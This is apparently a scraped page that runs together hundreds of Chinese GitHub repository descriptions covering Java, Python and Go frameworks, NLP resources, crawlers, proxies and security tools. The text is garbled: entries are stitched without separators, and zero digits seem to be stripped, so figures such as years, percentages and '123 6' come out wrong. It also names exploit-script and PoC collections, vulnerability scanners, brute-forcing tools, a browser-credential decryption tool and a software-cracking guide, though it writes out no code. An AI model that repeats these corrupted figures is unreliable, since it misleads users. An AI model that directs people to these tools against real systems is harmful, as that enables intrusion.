OA 支持国产麒麟操作系统和国产数据库 达梦 人大金仓 政务OA 军工信息化OA以Spring Cloud Netflix作为服务治理基础 展示基于tcc思想所实现的分布式事务解决方案一个帮助您完成从缩略视图到原视图无缝过渡转变的神奇框架 系统重构与迁移指南 手把手教你分析 评估现有系统 制定重构策略 探索可行重构方案 搭建测试防护网 进行系统架构重构 服务架构重构 模块重构 代码重构 数据库重构 重构后的架构守护版本检测升级 更新 库小说精品屋是一个多平台 web 安卓app 微信小程序 功能完善的屏幕自适应小说漫画连载系统 包含精品小说专区 轻小说专区和漫画专区 包括小说 漫画分类 小说 漫画搜索 小说 漫画排行 完本小说 漫画 小说 漫画评分 小说 漫画在线阅读 小说 漫画书架 小说 漫画阅读记录 小说下载 小说弹幕 小说 漫画自动采集 更新 纠错 小说内容自动分享到微博 邮件自动推广 链接自动推送到百度搜索引擎等功能 Android 徽章控件 致力于打造一款极致体验的 www wanandroid com 客户端 知识和美是可以并存的哦QAQn ≧ ≦ n 从源码层面 剖析挖掘互联网行业主流技术的底层实现原理 为广大开发者 “提升技术深度” 提供便利 目前开放 Spring 全家桶 Mybatis Netty Dubbo 框架 及 Redis Tomcat 中间件等Redis 一站式管理平台 支持集群的监控 安装 管理 告警以及基本的数据操作该项目不再维护 仅供学习参考专注批量推送的小而美的工具 目前支持 模板消息 公众号 模板消息 小程序 微信客服消息 微信企业号 企业微信消息 阿里云短信 阿里大于模板短信 腾讯云短信 云片网短信 E Mail HTTP请求 钉钉 华为云短信 百度云短信 又拍云短信 七牛云短信Android 平台开源天气 App 采用等开源库来实现 SpringBoot 相关漏洞学习资料 利用方法和技巧合集 黑盒安全评估 check listAndroid 权限请求框架 已适配 Android 11微信SDK JAVA 公众平台 开放平台 商户平台 服务商平台 QMQ是去哪儿网内部广泛使用的消息中间件 自2 12年诞生以来在去哪儿网所有业务场景中广泛的应用 包括跟交易息息相关的订单场景 也包括报价搜索等高吞吐量场景 Java 23种设计模式全归纳linux运维监控工具 支持系统信息 内存 cpu 温度 磁盘空间及IO 硬盘smart 系统负载 网络流量 进程等监控 API接口 大屏展示 拓扑图 端口监控 docker监控 日志文件监控 数据可视化 webSSH工具 堡垒机 跳板机 这可能是全网最好用的ViewPager轮播图 简单 高效 一行代码实现循环轮播 一屏三页任意变 指示器样式任你挑 一种简单有效的android组件化方案 支持组件的代码资源隔离 单独调试 集成调试 组件交互 UI跳转 生命周期等完整功能 一个强大 1 % 兼容 支持 AndroidX 支持 Kotlin并且灵活的组件化框架JPress 一个使用 Java 开发的建站神器 目前已经有 1 w 网站使用 JPress 进行驱动 其中包括多个政府机构 2 上市公司 中科院 红 字会等 分布式事务易用的轻量化网络爬虫 Android系统源码分析重构中一款免费的数据可视化工具 报表与大屏设计 类似于excel操作风格 在线拖拽完成报表设计 功能涵盖 报表设计 图形报表 打印设计 大屏设计等 永久免费 秉承“简单 易用 专业”的产品理念 极大的降低报表开发难度 缩短开发周期 节省成本 解决各类报表难题 Android Activity 滑动返回 支持微信滑动返回样式 横屏滑动返回 全屏滑动返回SpringBoot 基础教程 从入门到上瘾 基于2 M5制作 仿微信视频拍摄UI 基于ffmpeg的视频录制编辑Python 1 天从新手到大师 分享 GitHub 上有趣 入门级的开源项目中英文敏感词 语言检测 中外手机 电话归属地 运营商查询 名字推断性别 手机号抽取 身份证抽取 邮箱抽取 中日文人名库 中文缩写库 拆字词典 词汇情感值 停用词 反动词表 暴恐词表 繁简体转换 英文模拟中文发音 汪峰歌词生成器 职业名称词库 同义词库 反义词库 否定词库 汽车品牌词库 汽车零件词库 连续英文切割 各种中文词向量 公司名字大全 古诗词库 IT词库 财经词库 成语词库 地名词库 历史名人词库 诗词词库 医学词库 饮食词库 法律词库 汽车词库 动物词库 中文聊天语料 中文谣言数据 百度中文问答数据集 句子相似度匹配算法集合 bert资源 文本生成 摘要相关工具 cocoNLP信息抽取 2 21年最新总结 阿里 腾讯 百度 美团 头条等技术面试题目 以及答案 专家出题人分析汇总 AiLearning 机器学习 MachineLearning ML 深度学习 DeepLearning DL 自然语言处理 NLP123 6智能刷票 订票结巴中文分词 动手学深度学习 面向中文读者 能运行 可讨论 中英文版被全球175所大学采用教学 中文分词 词性标注 命名实体识别 依存句法分析 语义依存分析 新词发现 关键词短语提取 自动摘要 文本分类聚类 拼音简繁转换 自然语言处理微信个人号接口 微信机器人及命令行微信 三十行即可自定义个人号机器人 数据结构和算法必知必会的5 个代码实现JumpServer 是全球首款开源的堡垒机 是符合 4A 的专业运维安全审计系统 飞桨 核心框架 深度学习 机器学习高性能单机 分布式训练和跨平台部署 中国程序员容易发音错误的单词微信 跳一跳 Python 辅助 python模拟登陆一些大型网站 还有一些简单的爬虫 希望对你们有所帮助 ️ 如果喜欢记得给个star哦 网络爬虫实战 淘宝 京东 网易云 B站 123 6 抖音 笔趣阁 漫画小说下载 音乐电影下载等Python爬虫代理IP池 proxy pool wtfpython的中文翻译 施工结束 能力有限 欢迎帮我改进翻译提供多款 Shadowrocket 规则 带广告过滤功能 用于 iOS 未越狱设备选择性地自动翻墙 123 6 购票助手 支持集群 多账号 多任务购票以及 Web 页面管理 walle 瓦力 Devops开源项目代码部署平台一些非常有趣的python爬虫例子 对新手比较友好 主要爬取淘宝 天猫 微信 豆瓣 QQ等网站机器学习相关教程1 Chinese Word Vectors 上百种预训练中文词向量 网易云音乐命令行版本一款入门级的人脸 视频 文字检测以及识别的项目 编程随想 整理的 太子党关系网络 专门揭露赵国的权贵微信助手 1 每日定时给好友 女友 发送定制消息 2 机器人自动回复好友 3 群助手功能 例如 查询垃圾分类 天气 日历 电影实时票房 快递物流 PM2 5等 二维码生成器 支持 gif 动态图片二维码 阿布量化交易系统 股票 期权 期货 比特币 机器学习 基于python的开源量化交易 量化投资架构 book 中华新华字典数据库 包括歇后语 成语 词语 汉字 Git AWS Google 镜像 SS SSR VMESS节点行业研究报告的知识储备库中文翻译手写实现李航 统计学习方法 书中全部算法 Python 抖音机器人 论如何在抖音上找到漂亮小姐姐? 迁移学习python爬虫教程系列 从 到1学习python爬虫 包括浏览器抓包 手机APP抓包 如 fiddler mitmproxy 各种爬虫涉及的模块的使用 如等 以及IP代理 验证码识别 Mysql MongoDB数据库的python使用 多线程多进程爬虫的使用 css 爬虫加密逆向破解 JS爬虫逆向 分布式爬虫 爬虫项目实战实例等Python脚本 模拟登录知乎 爬虫 操作excel 微信公众号 远程开机越来越多的网站具有反爬虫特性 有的用图片隐藏关键数据 有的使用反人类的验证码 建立反反爬虫的代码仓库 通过与不同特性的网站做斗争 无恶意 提高技术 欢迎提交难以采集的网站 因工作原因 项目暂停 人人影视bot 完全对接人人影视全部无删减资源莫烦Python 中文AI教学飞桨 官方模型库 包含多种学术前沿和工业场景验证的深度学习模型 轻量级人脸检测模型 百度云 百度网盘Python客户端 Python进阶 Intermediate Python 中文版 提供同花顺客户端 国金 华泰客户端 雪球的基金 股票自动程序化交易以及自动打新 支持跟踪 joinquant ricequant 模拟交易 和 实盘雪球组合 量化交易组件QUANTAXIS 支持任务调度 分布式部署的 股票 期货 期权 港股 虚拟货币 数据 回测 模拟 交易 可视化 多账户 纯本地量化解决方案INFO SPIDER 是一个集众多数据源于一身的爬虫工具箱 旨在安全快捷的帮助用户拿回自己的数据 工具代码开源 流程透明 支持数据源包括GitHub QQ邮箱 网易邮箱 阿里邮箱 新浪邮箱 Hotmail邮箱 Outlook邮箱 京东 淘宝 支付宝 中国移动 中国联通 中国电信 知乎 哔哩哔哩 网易云音乐 QQ好友 QQ群 生成朋友圈相册 浏览器浏览历史 123 6 博客园 CSDN博客 开源中国博客 简书 中文BERT wwm系列模型 Python入门网络爬虫之精华版中文 iOS Mac 开发博客列表Python网页微信APIpkuseg多领域中文分词工具自己动手做聊天机器人教程基于搜狗微信搜索的微信公众号爬虫接口用深度学习对对联 v2ray xray多用户管理部署程序各种脚本 关于 虾米 xiami com 百度网盘 pan baidu com 115网盘 115 com 网易音乐 music 163 com 百度音乐 music baidu com 36 网盘 云盘 yunpan cn 视频解析 flvxz com bt torrent ↔ magnet ed2k 搜索 tumblr 图片下载 unzip查看被删的微信好友定投改变命运 让时间陪你慢慢变富 onregularinvesting com 机器学习实战 Python3 kNN 决策树 贝叶斯 逻辑回归 SVM 线性回归 树回归Statistical learning methods 统计学习方法 第2版 李航 笔记 代码 notebook 参考文献 Errata lihang stock 股票系统 使用python进行开发 基于深度学习的中文语音识别系统京东抢购助手 包含登录 查询商品库存 价格 添加 清空购物车 抢购商品 下单 查询订单等功能莫烦Python 中文AI教学机器学习算法python实现新浪微博爬虫 用python爬取新浪微博数据的算法以及通用生成对抗网络图像生成的理论与实践研究 青岛大学开源 Online Judge QQ群 49671 125 admin qduoj comWeRoBot 是一个微信公众号开发框架 基于Django的博客系统 中文近义词 聊天机器人 智能问答工具包开源财经数据接口库巡风是一款适用于企业内网的漏洞快速应急 巡航扫描系统 番号大全 解决电脑 手机看电视直播的苦恼 收集各种直播源 电视直播网站知识图谱构建 自动问答 基于kg的自动问答 以疾病为中心的一定规模医药领域知识图谱 并以该知识图谱完成自动问答与分析服务 出处本地电影刮削与整理一体化解决方案自动化运维平台 CMDB CD DevOps 资产管理 任务编排 持续交付 系统监控 运维管理 配置管理 wukong robot 是一个简单 灵活 优雅的中文语音对话机器人 智能音箱项目 还可能是首个支持脑机交互的开源智能音箱项目 获取斗鱼 虎牙 哔哩哔哩 抖音 快手等 55 个直播平台的真实流媒体地址 直播源 和弹幕 直播源可在 PotPlayer flv js 等播放器中播放 宝塔Linux面板 简单好用的服务器运维面板农业知识图谱 AgriKG 农业领域的信息检索 命名实体识别 关系抽取 智能问答 辅助决策CODO是一款为用户提供企业多混合云 一站式DevOps 自动化运维 完全开源的云管理平台 自动化运维平台Web Pentesting Fuzz 字典 一个就够了 计算机网络 自顶向下方法 原书第6版 编程作业 Wireshark实验文档的翻译和解答 中文古诗自动作诗机器人 屌炸天 基于tensorflow1 1 api 正在积极维护升级中 快star 保持更新 PyQt Examples PyQt各种测试和例子 PyQt4 PyQt5海量中文预训练ALBERT模型汉字转拼音 pypinyin 数据结构与算法 leetcode lintcode题解 Pytorch模型训练实用教程 中配套代码实时获取新浪 腾讯 的免费股票行情 集思路的分级基金行情Python爬虫 Flask网站 免费ShadowSocks账号 ssr订阅 json 订阅实战 多种网站 电商数据爬虫 包含 淘宝商品 微信公众号 大众点评 企查查 招聘网站 闲鱼 阿里任务 博客园 微博 百度贴吧 豆瓣电影 包图网 全景网 豆瓣音乐 某省药监局 搜狐新闻 机器学习文本采集 fofa资产采集 汽车之家 国家统计局 百度关键词收录数 蜘蛛泛目录 今日头条 豆瓣影评 携程 小米应用商店 安居客 途家民宿 ️ ️ ️ 微信爬虫展示项目 SQL 审核查询平台团子翻译器 个人兴趣制作的一款基于OCR技术的翻译器自动化运维平台 代码及应用部署CI CD 资产管理CMDB 计划任务管理平台 SQL审核 回滚 任务调度 站内WIKISource Code Security Audit 源代码安全审计 Exphub 漏洞利用脚本库 包括的漏洞利用脚本 最新添加我的自学笔记 终身更新 当前专注System基础 MLSys 使用机器学习算法完成对123 6验证码的自动识别Python 开源项目之 自学编程之路 保姆级教程 AI实验室 宝藏视频 数据结构 学习指南 机器学习实战 深度学习实战 网络爬虫 大厂面经 程序人生 资源分享 中文文本分类基于pytorch 开箱即用 根据网易云音乐的歌单 下载flac无损音乐到本地腾讯优图高精度双分支人脸检测器文本纠错等模型实现 开箱即用 3 天掌握量化交易 持续更新 中文分词 词性标注 命名实体识别 依存句法分析 新词发现 关键词短语提取 自动摘要 文本分类聚类 拼音简繁 自然语言处理中文公开聊天语料库豆瓣读书的爬虫总结梳理自然语言处理工程师 NLP 需要积累的各方面知识 包括面试题 各种基础知识 工程能力等等 提升核心竞争力中文自然语言处理数据集 平时做做实验的材料 欢迎补充提交合并 一个可以自己进行训练的中文聊天机器人 根据自己的语料训练出自己想要的聊天机器人 可以用于智能客服 在线问答 智能聊天等场景 目前包含seq2seq seqGAN版本 tf2 版本 pytorch版本 股票量化框架 支持行情获取以及交易微博爬虫 持续维护 Bilibili 用户爬虫 deepin源移植 Debian Ubuntu上最快的QQ 微信安装方式 新闻网页正文通用抽取器 Beta 版 flag on post 自动更新域名解析到本机IP 支持dnspod 阿里DNS CloudFlare 华为云 DNSCOM 本项目针对字符型图片验证码 使用tensorflow实现卷积神经网络 进行验证码识别 owllook 小说搜索引擎中文语言理解测评基准python中文库 python人工智能大数据自动化接口测试开发 书籍下载及python库汇总china testing github io 2 19新型冠状病毒疫情时间序列数据仓库Python 黑魔法手册单阶段通用目标检测器一个拍照做题程序 输入一张包含数学计算题的图片 输出识别出的数学计算式以及计算结果 video download B站视频下载中文命名实体识别 TensorFlow Python 中文数据结构和算法教程 验证码识别 训练Python爬虫实战 模拟登陆各大网站 包含但不限于 滑块验证 拼多多 美团 百度 bilibili 大众点评 淘宝 如果喜欢请start ️学无止下载器 慕课下载器 Mooc下载 慕课网下载 中国大学下载 爱课程下载 网易云课堂下载 学堂在线下载 超星学习通下载 支持视频 课件同时下载一个高级web目录 文件扫描工具 功能将会强于DirBuster Dirsearch cansina 御剑 搜索所有中文NLP数据集 附常用英文NLP数据集中文实体识别与关系提取2 19新型冠状病毒疫情实时爬虫及github release archive以及项目文件的加速项目安卓应用安全学习抓取大量免费代理 ip 提取有效 ip 使用RoBERTa中文预训练模型 RoBERTa for Chinese 用于训练中英文对话系统的语料库敏感词过滤的几种实现 某1w词敏感词库简单易用的Python爬虫框架 QQ交流群 59751 56 使用Bert ERNIE 进行中文文本分类为 CSAPP 视频课程提供字幕 翻译 PPT Lab PyTorch 官方中文教程包含 6 分钟快速入门教程 强化教程 计算机视觉 自然语言处理 生成对抗网络 强化学习 欢迎 Star Fork 兜哥出品 <一本开源的NLP入门书籍 图像翻译 条件GAN AI绘画用Resnet1 1 GPT搭建一个玩王者荣耀的AI各种漏洞poc Exp的收集或编写斗地主AIVulmap 是一款 web 漏洞扫描和验证工具 可对 webapps 进行漏洞扫描 并且具备漏洞验证功能提供超過 5 個金融資料 台股為主 每天更新 finmind github io 数据接口 百度 谷歌 头条 微博指数 宏观数据 利率数据 货币汇率 千里马 独角兽公司 新闻联播文字稿 影视票房数据 高校名单 疫情数据 PyOne 一款给力的onedrive文件管理 分享程序 使用开发的用于迅速搭建并使用 WebHook 进行自动化部署和运维 支持 Github GitLab Gogs GitOsc 跟我一起写Makefile重制版 python自动化运维 技术与最佳实践 书中示例及案例源码自然语言处理实验 sougou数据集 TF IDF 文本分类 聚类 词向量 情感识别 关系抽取等微信公众平台 Python 开发包 DEPRECATED Weblogic一键漏洞检测工具 V1 5 更新时间 2 2 73 完备优雅的微信公众号接口 原生支持同步 协程使用 本程序旨在为安全应急响应人员对Linux主机排查时提供便利 实现主机侧Checklist的自动全面化检测 根据检测结果自动数据聚合 进行黑客攻击路径溯源 PyCharm 中文指南 安装 破解 效率 技巧类似按键精灵的鼠标键盘录制和自动化操作 模拟点击和键入GPT2 for Chinese chitchat 用于中文闲聊的GPT2模型 实现了DialoGPT的MMI思想 中华人民共和国国家标准 GB T 226 行政区划代码基于python的量化交易平台中文语音识别基于 OneBot 标准的 Python 异步 QQ 机器人框架Real World Masked Face Dataset 口罩人脸数据集 Vulfocus 是一个漏洞集成平台 将漏洞环境 docker 镜像 放入即可使用 开箱即用 谷歌 百度 必应图片下载 基于方面的情感分析 使用PyTorch实现 深度学习与计算机视觉 配套代码ART环境下自动化脱壳方案利用网络上公开的数据构建一个小型的证券知识图谱 知识库中文资源精选 官方网站 安装教程 入门教程 视频教程 实战项目 学习路径 QQ群 167122861 公众号 磐创AI 微信群二维码 www tensorflownews com Pre Trained Chinese XLNet 中文XLNet预训练模型 新浪微博Python SDK有关burpsuite的插件 非商店 文章以及使用技巧的收集 此项目不再提供burpsuite破解文件 如需要请在博客mrxn net下载Python3编写的CMS漏洞检测框架基于django的工作流引擎 工单 ️ 哔哩云 不支持任意文件的全速上传与下载微信SDK 包括微信支付 微信公众号 微信登陆 微信消息处理等中文自然语言理解堡垒机 云桌面自动化运维 审计 录像 文件管理 sftp上传 实时监控 录像回放 网页版rz sz上传下载 动态口令 django转换中国知网 CAJ 格式文献为 PDF 佛系转换 成功与否 皆是玄学 HanLP作者的新书 自然语言处理入门 详细笔记 业界良心之作 书中不是枯燥无味的公式罗列 而是用白话阐述的通俗易懂的算法模型 从基本概念出发 逐步介绍中文分词 词性标注 命名实体识别 信息抽取 文本聚类 文本分类 句法分析这几个热门问题的算法原理与工程实现 Python3 网络爬虫实战 部分含详细教程 猫眼 腾讯视频 豆瓣 研招网 微博 笔趣阁小说 百度热点 B站 CSDN 网易云阅读 阿里文学 百度股票 今日头条 微信公众号 网易云音乐 拉勾 有道 unsplash 实习僧 汽车之家 英雄联盟盒子 大众点评 链家 LPL赛程 台风 梦幻西游 阴阳师藏宝阁 天气 牛客网 百度文库 睡前故事 知乎 Wish微信公众号文章的爬虫 Python Web开发实战 书中源码一直可用的GoAgent 会定时扫描可用的google gae ip 提供可自动化获取ip运行的版本层剪枝 通道剪枝 知识蒸馏 中文命名实体识别 包括多种模型 HMM CRF BiLSTM BiLSTM CRF的具体实现 The Way to Go 中文译本 中文正式名 Go 入门指南 谢谢 Solutions to LeetCode by Go 1 % test coverage runtime beats 1 % LeetCode 题解一款轻量级 高性能 功能强大的内网穿透代理服务器 支持tcp udp socks5 http等几乎所有流量转发 可用来访问内网网站 本地支付接口调试 ssh访问 远程桌面 内网dns解析 内网socks5代理等等 并带有功能强大的web管理端 Go语言高级编程 开源图书 涵盖CGO Go汇编语言 RPC实现 Protobuf插件实现 Web框架实现 分布式系统等高阶主题 完稿 是一个跨平台的强加密无特征的代理软件 零配置 算法模板 最科学的刷题方式 最快速的刷题路径 你值得拥有 百度网盘不限速客户端 golang qt5 跨平台图形界面是golang实现的高性能http https websocket tcp socks5代理服务器 支持内网穿透 链式代理 通讯加密 夜读 通过 bilibili 在线直播的方式分享 Go 相关的技术话题 每天大家在微信 telegram Slack 上及时沟通交流编程技术话题 支持多家云存储的云盘系统 这里是写博客的地方 Halfrost Field 冰霜之地Lantern官方版本下载 蓝灯 翻墙 代理 科学上网 外网 加速器 梯子 路由基于gin vue搭建的后台管理系统框架 集成jwt鉴权 权限管理 动态路由 分页封装 多点登录拦截 资源权限 上传下载 代码生成器 表单生成器 通用工作流等基础功能 五分钟一套CURD前后端代码 目VUE3版本正在重构 欢迎issue和pr 分布式爬虫管理平台 支持任何语言和框架Golang标准库 对于程序员而言 标准库与语言本身同样重要 它好比一个百宝箱 能为各种常见的任务提供完美的解决方案 以示例驱动的方式讲解Golang的标准库 天用Go动手写 从零实现系列是一个高性能且低损耗的 goroutine 池 有 有 设计模式 Golang实现 研磨设计模式 读书笔记Golang实现的基于beego框架的接口在线文档管理系统高性能开源RTSP流媒体服务器 基于go语言研发 维护和优化 RTSP推模式转发 RTSP拉模式转发 是一个高性能 轻量级 非阻塞的事件驱动 Go 网络框架 基于Gin Vue Element UI的前后端分离权限管理系统脚手架 包含了 多租户的支持 基础用户管理功能 jwt鉴权 代码生成器 RBAC资源控制 表单构建 定时任务等 3分钟构建自己的中后台项目 文档蓝鲸智云配置平台 BlueKing CMDB 今日热榜 一个获取各大热门网站热门头条的聚合网站 使用Go语言编写 多协程异步快速抓取信息 预览 mo fish一条命令离线安装高可用kubernetes 3min装完 7 M 1 年证书 生产环境稳如老狗阿里巴巴开源的一款简单易用 功能强大的混沌实验注入工具 Go语言四十二章经 详细讲述Go语言规范与语法细节及开发中常见的误区 通过研读标准库等经典代码设计模式 启发读者深刻理解Go语言的核心思维 进入Go语言开发的更高阶段 ️一个轻巧的网络混淆代理 基于Golang轻量级TCP并发服务器框架定时任务管理系统KubeOperator 是一个开源的轻量级 Kubernetes 发行版 专注于帮助企业规划 部署和运营生产级别的 K8s 集群 本系统是集工单统计 任务钩子 权限管理 灵活配置流程与模版等等于一身的开源工单系统 当然也可以称之为工作流引擎 致力于减少跨部门之间的沟通 自动任务的执行 提升工作效率与工作质量 减少不必要的工作量与人为出错率 Go实现的Trojan代理 支持多路复用 路由功能 CDN中转 Shadowsocks混淆插件 多平台 无依赖 Go语法树入门 开启自制编程语言和编译器之旅 开源免费图书 Go语言进阶 掌握抽象语法树 Go语言AST 凹语言 一款可全平台运行的浏览器数据导出解密工具 Golang相关 审稿进度8 % Go语法 Go并发思想 Go与web开发 Go微服务设施等Jupiter是斗鱼开源的面向服务治理的Golang微服务框架Elasticsearch 可视化DashBoard 支持Es监控 实时搜索 Index template快捷替换修改 索引列表信息查看 SQL converts to DSL等 从问题切入 串连 Go 语言相关的所有知识 融会贯通 golang design go questionsWeChat SDK for Go 微信SDK 简单 易用 go fastdfs 是一个简单的分布式文件系统 私有云存储 具有无中心 高性能 高可靠 免维护等优点 支持断点续传 分块上传 小文件合并 自动同步 自动修复 Mastering GO 中文译本 玩转 GO 云原生且易用的应用管理平台 Go Web 基础 是一套针对 Google 出品的 Go 语言的视频语音教程 主要面向完成 Go 编程基础 教程后希望进一步了解有关 Go Web 开发的学习者 中文名 悟空 API 网关 是一个基于 Golang开发的微服务网关 能够实现高性能 HTTP API 转发 服务编排 多租户管理 API 访问权限控制等目的 拥有强大的自定义插件系统可以自行扩展 并且提供友好的图形化配置界面 能够快速帮助企业进行 API 服务治理 提高 API 服务的稳定性和安全性 集合多家 API 的新一代图床MIT课程 Distributed Systems 学习和翻译Go语言圣经中文版 只接收PR Issue请提交到golang china gopl zh trojan多用户管理部署程序 支持web页面管理BookStack 基于MinDoc 使用Beego开发的在线文档管理系统 功能类似Gitbook和看云 weixin wechat 微信公众平台 微信企业号 微信商户平台 微信支付 go golang sdk 蓝眼云盘 Eyeblue Cloud Storage 语言高性能编程 Go 语言陷阱 Gotchas Traps 使用 XMind 记录 Linux 操作系统 网络 C Golang 以及数据库的一些设计cqhttp的golang实现 轻量 原生跨平台 mqant是一款基于Golang语言的简洁 高效 高性能的分布式微服务框架基于react node js go开发的微商城 含微信小程序 MM Wiki 一个轻量级的企业知识分享与团队协同软件 可用于快速构建企业 Wiki 和团队知识分享平台 部署方便 使用简单 帮助团队构建一个信息共享 文档管理的协作环境 Go 语言中文网 Golang中文社区 Go语言学习园地 源码基于 Gin 进行模块化设计的 API 框架 封装了常用功能 使用简单 致力于进行快速的业务研发 比如 支持 cors 跨域 jwt 签名验证 zap 日志收集 panic 异常捕获 trace 链路追踪 prometheus 监控指标 swagger 文档生成 viper 配置文件解析 gorm 数据库组件 gormgen 代码生成工具 graphql 查询语言 errno 统一定义错误码 gRPC 的使用 等等 syncd是一款开源的代码部署工具 它具有简单 高效 易用等特点 可以提高团队的工作效率 一款由 YSRC 开源的主机入侵检测系统golang面试题集合这是一个可以识别视频语音自动生成字幕SRT文件的开源 Windows GUI 软件工具 一款内网综合扫描工具 方便一键自动化 全方位漏扫扫描 是一个用于在两个redis之间同步数据的工具 满足用户非常灵活的同步 迁移需求 Overlord是哔哩哔哩基于Go语言编写的memcache和redis cluster的代理及集群管理功能 致力于提供自动化高可用的缓存服务解决方案 Stack RPC 中文示例 教程 资料 源码解读ICMP流量伪装转发工具Freedom是一个基于六边形架构的框架 可以支撑充血的领域模型范式 Go2编程指南 开源图书 重点讲解Go2新特性 以及Go1教程中较少涉及的特性语言高性能分词golang写的IM服务器 服务组件形式 结巴 中文分词的Golang版本xorm是一个简单而强大的Go语言ORM库 通过它可以使数据库操作非常简便 本库是基于原版xorm的定制增强版本 为xorm提供类似ibatis的配置文件及动态SQL支持 支持AcitveRecord操作一个 Go 语言实现的快速 稳定 内嵌的 k v 数据库 高性能表格数据导出器基于Golang的开源社区系统 版本网易云音乐ncm文件格式转换 go 实现的压测工具 ab locust Jmeter压测工具介绍 单台机器1 w连接压测实战 抓包截取项目中的数据库请求并解析成相应的语句 Go专家编程 Go语言快速入门 轻松进阶 <<自己动手写docker 源码Go 每日一库kunpeng是一个Golang编写的开源POC框架 库 以动态链接库的形式提供各种语言调用 通过此项目可快速开发漏洞检测类的系统 vue js element框架 golang beego框架 开发的运维发布系统 支持git jenkins版本发布 go ssh BT两种文件传输方式选择 支持部署前准备任务和部署后任务钩子函数 Go 从入门到实战 学习笔记 从零开始学 Go Gin 框架 基本语法包括 26 个Demo Gin 框架包括 Gin 自定义路由配置 Gin 使用 Logrus 进行日志记录 Gin 数据绑定和验证 Gin 自定义错误处理 Go gRPC Hello World 持续更新中 Go 学习之路 Go 开发者博客 Go 微信公众号 Go 学习资料 文档 书籍 视频 微信 WeChat 支付宝 AliPay 的Go版本SDK 极简 易用的聚合支付SDK Go by Example 通过例子学 GolangPPGo Job是一款可视化的 多人多权限的 一任务多机执行的定时任务管理系统 采用golang开发 安装方便 资源消耗少 支持大并发 可同时管理多台服务器上的定时任务 Golang实现的IP代理池是一款用Go语言开发的web应用框架 API特性类似于Tornado并且拥有比Tornado更好的性能 自己动手写Java虚拟机 随书源代码支付宝 AliPay SDK for Go 集成简单 功能完善 持续更新 支持公钥证书和普通公钥进行签名和验签 ARCHIVED Geph 迷霧通帮助你将本地端口暴露在外网 支持TCP UDP 当然也支持HTTP 深入Go并发编程研讨课无状态子域名爆破工具手机号码归属地信息库 手机号归属地查询 phone dat 最后更新 2 21年 6月 golang基于websocket单台机器支持百万连接分布式聊天 IM 系统基于mongodb oplog的集群复制工具 可以满足迁移和同步的需求 进一步实现灾备和多活功能 Gin Gorm开发Golang API快速开发脚手架简单可信赖的任务管理工具Go语言实例教程从入门到进阶 包括基础库使用 设计模式 面试易错点 工具类 对接第三方等授权框架简体中文翻译 自动抓取tg频道 订阅地址 公开互联网上的ss ssr vmess trojan节点信息 聚合去重后提供节点列表轻量级 go 业务框架 哪吒监控 一站式轻监控轻运维系统 支持系统状态 TCP Ping 监控报警 命令批量执行和计划任务 Go 语言官方教程中文版工程师知识管理系统 基于golang go语言 beego框架 每个行业都有自己的知识管理系统 engineercms旨在为土木工程师们打造一款适用的基于web的知识管理系统 它既可以用于管理个人的项目资料 也可以用于管理项目团队资料 它既可以运行于个人电脑 也可以放到服务器上 支持提取码分享文件 onlyoffice实时文档协作 直接在线编辑dwg文件 office文档 在线利用mindoc创作你的书籍 阅览PDF文件 通用的业务流程设置 手机端配套小程序 微信搜索“珠三角设代”或“青少儿书画”即可呼出小程序 边界打点后的自动化渗透工具一个集审核 执行 备份及生成回滚语句于一身的MySQL运维工具汉字转拼音 Go资源精选中文版 含中文图书大全 语言实现的 Redis 服务器和分布式集群 超全golang面试题合集 golang学习指南 golang知识图谱 入门成长路线 一份涵盖大部分golang程序员所需要掌握的核心知识 常用第三方库 mysql mq es redis等 机器学习库 算法库 游戏库 开源框架 自然语言处理nlp库 网络库 视频库 微服务框架 视频教程 音频音乐库 图形图片库 物联网库 地理位置信息 嵌入式脚本库 编译器库 数据库 金融库 电子邮件库 电子书籍 分词 数据结构 设计模式 去html tag标签等 go学习 go面试go语言扩展包 收集一些常用的操作函数 辅助更快的完成开发工作 并减少重复代码百灵快传 基于Go语言的高性能 手机电脑超大文件传输神器 局域网共享文件服务器 LAN large file transfer tool 一个基于云存储的网盘系统 用于自建私人网盘或企业网盘 go分布式服务器 基于内存mmo个人博客微信小程序服务端 SDK for Golang 控制台颜色渲染工具库 支持16色 256色 RGB色彩渲染输出 使用类似于 Print Sprintf 兼容并支持 Windows 环境的色彩渲染基于 IoC 的 Go 后端一站式开发框架 v2ray web manager 是一个v2ray的面板 也是一个集群的解决方案 同时增加了流量控制 账号管理 限速等功能 key admin panel web cluster 集群 proxyServerScan一款使用Golang开发的高并发网络扫描 服务探测工具 是http client领域的瑞士军刀 小巧 强大 犀利 具体用法可看文档 如使用迷惑或者API用得不爽都可提issuesTcpRoute TCP 层的路由器 对于 TCP 连接自动从多个线路 电信 联通 移动 多个域名解析结果中选择最优线路 Bifrost 面向生产环境的 MySQL 同步到Redis MongoDB ClickHouse MySQL等服务的异构中间件应用网关 提供快速 安全的应用交付 身份认证 WAF CC HTTPS以及ACME自动证书 A telegram bot for rss reader 一个支持应用内阅读的 Telegram RSS Bot RESTful API 文档生成工具 支持和 Ruby 等大部分语言 基于gin gorm开发的个人博客项目基于Go语言的国密SM2 SM3 SM4算法库 Golang 设计模式一个阿里云盘列表程序 一款小巧的基于Go构建的开发框架 可以快速构建API服务或者Web网站进行业务开发 遵循SOLID设计原则并发编程实战 第2版 Go 学习 Go 进阶 Go 实用工具类 Go kit Go Micro 微服务实践 Go 推送基于DDD的o2o的业务模型及基础 使用Golang gRPC Thrift实现Sharingan 写轮眼 是一个基于golang的流量录制回放工具 适合项目重构 回归测试等 百度云网盘爬虫基于beego的进销存系统 TeaWeb 可视化的Web代理服务 DEMO teaos cn 白帽子安全开发实战 配套代码抖音推荐 搜索页视频列表视频爬虫方案 基于app 虚拟机或真机 相关技术 golang adb一款甲方资产巡航扫描系统 系统定位是发现资产 进行端口爆破 帮助企业更快发现弱口令问题 主要功能包括 资产探测 端口爆破 定时任务 管理后台识别 报表展示提供微信终端版本 微信命令行版本聊天功能 微信机器人 ️ 互联网最全大厂技术分享PPT 持续更新中 各大技术交流会 活动资料汇总 如 QCon 全球运维技术大会 GDG 全球技术领导力峰会 大前端大会 架构师峰会 敏捷开发DevOps OpenResty Elastic 欢迎 PR Issues日本麻将助手 牌效 防守 记牌 支持雀魂 天凤 开源客服系统GO语言开发GO FLY 免费客服系统一个查询IP地理信息和CDN服务提供商的离线终端工具 是一个用于系统重构 系统迁移和系统分析的瑞士军刀 它可以分析代码中的测试坏味道 模块化分析 行数统计 分析调用与依赖 Git 分析以及自动化重构等 一个直播录制工具Mastering Go 第二版中文版来袭 渗透测试情报收集工具分布式定时任务调度平台高度模块化 遵循 